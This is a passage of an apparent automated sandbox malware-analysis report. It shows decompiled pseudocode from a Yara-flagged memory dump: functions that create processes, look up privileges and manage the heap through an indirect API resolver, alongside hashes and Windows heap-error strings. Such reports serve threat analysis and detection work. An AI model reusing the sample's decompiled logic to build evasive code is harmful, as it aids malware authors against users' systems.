				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                        0x00407260
                                                                        0x0040726f
                                                                        0x00407273
                                                                        0x0040727e
                                                                        0x0040728e
                                                                        0x0040729e
                                                                        0x004072a3
                                                                        0x004072aa
                                                                        0x004072ac
                                                                        0x004072ad
                                                                        0x004072ba
                                                                        0x004072bc
                                                                        0x004072be
                                                                        0x004072db
                                                                        0x004072db
                                                                        0x00000000
                                                                        0x004072dd
                                                                        0x004072e2

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                        • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00418530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DB0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






                                                                        0x00418533
                                                                        0x00418542
                                                                        0x0041854a
                                                                        0x00418584
                                                                        0x00418588

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                        • Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
                                                                        • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                        • Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}





                                                                        0x004184b4
                                                                        0x004184bb
                                                                        0x004184c3
                                                                        0x004184cf
                                                                        0x004184d7
                                                                        0x004184ed
                                                                        0x004184f1

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                        • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                                                        • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                        • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x004184cf
                                                                        0x004184d7
                                                                        0x004184ed
                                                                        0x004184f1

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                                                        0x00418497
                                                                        0x0041849f
                                                                        0x004184a2
                                                                        0x004184a6
                                                                        0x004184ab
                                                                        0x004184ad
                                                                        0x004184b1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x0041863a
                                                                        0x00418650
                                                                        0x00418654

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                        • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                                                        • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                        • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0151967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d093b95bdabade9245981aec209fce9a94892cd2e036e304996a8908ac3ef710
                                                                        • Instruction ID: 464aa9e1f91d0331aabafe1aacb60773aa293d48df35639d53a1eb87655e6882
                                                                        • Opcode Fuzzy Hash: d093b95bdabade9245981aec209fce9a94892cd2e036e304996a8908ac3ef710
                                                                        • Instruction Fuzzy Hash: A0B09B729415D5C5E612D7A4460871B795077D1755F26C451D2020B45F4778C091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0158B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0158B314
                                                                        • The instruction at %p tried to %s , xrefs: 0158B4B6
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0158B47D
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0158B2F3
                                                                        • *** then kb to get the faulting stack, xrefs: 0158B51C
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0158B38F
                                                                        • an invalid address, %p, xrefs: 0158B4CF
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0158B53F
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0158B39B
                                                                        • The resource is owned shared by %d threads, xrefs: 0158B37E
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0158B3C5
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0158B3D6
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0158B484
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0158B432
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0158B476
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0158B323
                                                                        • *** enter .cxr %p for the context, xrefs: 0158B50D
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0158B48F
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0158B352
                                                                        • This failed because of error %Ix., xrefs: 0158B446
                                                                        • a NULL pointer, xrefs: 0158B4E0
                                                                        • read from, xrefs: 0158B4AD, 0158B4B2
                                                                        • *** Inpage error in %ws:%s, xrefs: 0158B418
                                                                        • The critical section is owned by thread %p., xrefs: 0158B3B9
                                                                        • write to, xrefs: 0158B4A6
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0158B305
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0158B2DC
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0158B374
                                                                        • *** enter .exr %p for the exception record, xrefs: 0158B4F1
                                                                        • <unknown>, xrefs: 0158B27E, 0158B2D1, 0158B350, 0158B399, 0158B417, 0158B48E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 12be4aada026a1af60d7d3041c6a2cf8af332a670e7ed6b442a7b08c896e4f98
                                                                        • Instruction ID: 07dcf05759df0acd86fd6fa6ebaeb9b94b487e49e22c20e17798c60a091f328a
                                                                        • Opcode Fuzzy Hash: 12be4aada026a1af60d7d3041c6a2cf8af332a670e7ed6b442a7b08c896e4f98
                                                                        • Instruction Fuzzy Hash: BC81E079A40212FFDB216A4A8C56D6E3F2EBF96AA1F40005DF5043F132E7798551CAF2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01591C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E01591C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x14b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014DB150();
				} else {
					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x15c589c);
				E014DB150("Heap error detected at %p (heap handle %p)\n",  *0x15c58a0);
				_t27 =  *0x15c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01591E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014DB150();
				} else {
					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E014DB150("Error code: %d - %s\n",  *0x15c5898);
				_t113 =  *0x15c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014DB150("Parameter1: %p\n",  *0x15c58a4);
				}
				_t115 =  *0x15c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014DB150("Parameter2: %p\n",  *0x15c58a8);
				}
				_t117 =  *0x15c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014DB150("Parameter3: %p\n",  *0x15c58ac);
				}
				_t119 =  *0x15c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x15c58b4);
					E014DB150("Last known valid blocks: before - %p, after - %p\n",  *0x15c58b0);
				} else {
					_t120 =  *0x15c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014DB150();
				} else {
					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E014DB150("Stack trace available at %p\n", 0x15c58c0);
			}











                                                                        0x01591c10
                                                                        0x01591c16
                                                                        0x01591c1e
                                                                        0x01591c3d
                                                                        0x01591c3e
                                                                        0x01591c20
                                                                        0x01591c35
                                                                        0x01591c3a
                                                                        0x01591c44
                                                                        0x01591c55
                                                                        0x01591c5a
                                                                        0x01591c65
                                                                        0x01591c67
                                                                        0x00000000
                                                                        0x01591c6e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01591c67
                                                                        0x01591cdc
                                                                        0x01591ce5
                                                                        0x01591d04
                                                                        0x01591d05
                                                                        0x01591ce7
                                                                        0x01591cfc
                                                                        0x01591d01
                                                                        0x01591d0b
                                                                        0x01591d17
                                                                        0x01591d1f
                                                                        0x01591d25
                                                                        0x01591d30
                                                                        0x01591d4f
                                                                        0x01591d50
                                                                        0x01591d32
                                                                        0x01591d47
                                                                        0x01591d4c
                                                                        0x01591d61
                                                                        0x01591d67
                                                                        0x01591d68
                                                                        0x01591d6e
                                                                        0x01591d79
                                                                        0x01591d98
                                                                        0x01591d99
                                                                        0x01591d7b
                                                                        0x01591d90
                                                                        0x01591d95
                                                                        0x01591daa
                                                                        0x01591db0
                                                                        0x01591db1
                                                                        0x01591db7
                                                                        0x01591dc2
                                                                        0x01591de1
                                                                        0x01591de2
                                                                        0x01591dc4
                                                                        0x01591dd9
                                                                        0x01591dde
                                                                        0x01591df3
                                                                        0x01591df9
                                                                        0x01591dfa
                                                                        0x01591e00
                                                                        0x01591e0a
                                                                        0x01591e13
                                                                        0x01591e32
                                                                        0x01591e33
                                                                        0x01591e15
                                                                        0x01591e2a
                                                                        0x01591e2f
                                                                        0x01591e39
                                                                        0x01591e4a
                                                                        0x01591e02
                                                                        0x01591e02
                                                                        0x01591e08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01591e08
                                                                        0x01591e5b
                                                                        0x01591e7a
                                                                        0x01591e7b
                                                                        0x01591e5d
                                                                        0x01591e72
                                                                        0x01591e77
                                                                        0x01591e95

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: 147ee031601f2c989723ce167174ff51c9e853a6aa71cd1b4bb3f53c6f6bfd8a
                                                                        • Instruction ID: 1170444fa4db126e90f60d875f72c0858801f6afa49f2b4ad3e2bdaaeeb6701f
                                                                        • Opcode Fuzzy Hash: 147ee031601f2c989723ce167174ff51c9e853a6aa71cd1b4bb3f53c6f6bfd8a
                                                                        • Instruction Fuzzy Hash: 1961F43A620993CFDF51AB9AD4D992977E4FB15D71B1A802FF40A6F320D73498408B1B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014E3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E014E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E014E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E014E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E014E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E014E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E014E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L014F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0151F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01521370(_t276, 0x14b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0151BB40(0,  &_v68, _t170);
									if(L014E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
